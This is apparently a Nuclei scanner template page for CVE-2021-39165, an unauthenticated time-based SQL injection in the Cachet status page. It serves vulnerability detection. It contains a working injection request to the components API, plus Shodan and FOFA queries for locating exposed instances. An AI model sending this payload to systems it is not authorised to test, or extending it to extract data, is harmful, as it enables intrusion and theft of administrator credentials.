Cachet <=2.3.18 - SQL Injection

ID: CVE-2021-39165

Severity: medium

Author: tess

Tags: time-based-sqli,cve,cve2021,cachet,sqli,chachethq

Description

Cachet is an open source status page. With Cachet prior to and including 2.3.18, there is a SQL injection which is in the SearchableTrait#scopeSearch(). Attackers without authentication can utilize this vulnerability to exfiltrate sensitive data from the database such as administrator’s password and session. The original repository of Cachet https://github.com/CachetHQ/Cachet is not active, the stable version 2.3.18 and it’s developing 2.4 branch is affected.

YAML Source

id: CVE-2021-39165

info:
  name: Cachet <=2.3.18 - SQL Injection
  author: tess
  severity: medium
  description: |
    Cachet is an open source status page. With Cachet prior to and including 2.3.18, there is a SQL injection which is in the `SearchableTrait#scopeSearch()`. Attackers without authentication can utilize this vulnerability to exfiltrate sensitive data from the database such as administrator's password and session. The original repository of Cachet <https://github.com/CachetHQ/Cachet> is not active, the stable version 2.3.18 and it's developing 2.4 branch is affected.
  impact: |
    Successful exploitation of this vulnerability could allow an attacker to execute arbitrary SQL queries, potentially leading to unauthorized access, data leakage, or data manipulation.
  remediation: |
    Upgrade Cachet to a version higher than 2.3.18 or apply the necessary patches provided by the vendor.
  reference:
    - https://www.leavesongs.com/PENETRATION/cachet-from-laravel-sqli-to-bug-bounty.html
    - https://github.com/fiveai/Cachet/commit/27bca8280419966ba80c6fa283d985ddffa84bb6
    - https://github.com/W0rty/CVE-2021-39165/blob/main/exploit.py
    - https://nvd.nist.gov/vuln/detail/CVE-2021-39165
    - https://github.com/fiveai/Cachet/security/advisories/GHSA-79mg-4w23-4fqc
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N
    cvss-score: 6.5
    cve-id: CVE-2021-39165
    cwe-id: CWE-287
    epss-score: 0.04209
    epss-percentile: 0.92226
    cpe: cpe:2.3:a:chachethq:cachet:*:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 1
    vendor: chachethq
    product: cachet
    shodan-query: http.favicon.hash:-1606065523
    fofa-query: icon_hash=-1606065523
  tags: time-based-sqli,cve,cve2021,cachet,sqli,chachethq

http:
  - raw:
      - |
        @timeout: 20s
        GET /api/v1/components?name=1&1%5B0%5D=&1%5B1%5D=a&1%5B2%5D=&1%5B3%5D=or+'a'='a')%20and%20(select%20sleep(6))-- HTTP/1.1
        Host: {{Hostname}}

    redirects: true
    max-redirects: 2
    matchers:
      - type: dsl
        dsl:
          - 'duration>=6'
          - 'status_code == 200'
          - 'contains(content_type, "application/json")'
          - 'contains(body, "pagination") && contains(body, "data")'
        condition: and
# digest: 4b0a00483046022100afb2cba16c19926be00dcd3c7374083b67e994b81a47ae0fc235a4588b8f78e702210093f8c9c97c76a87db3c14622bd0611c73921f81200e437f6b9c8978af101e9ce:922c64590222798bb761d5b6d8e72950

Guide to check the vulnerabilities

This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.

$ nuclei -u "URL" -t "http/cves/2021/CVE-2021-39165.yaml"

View on Github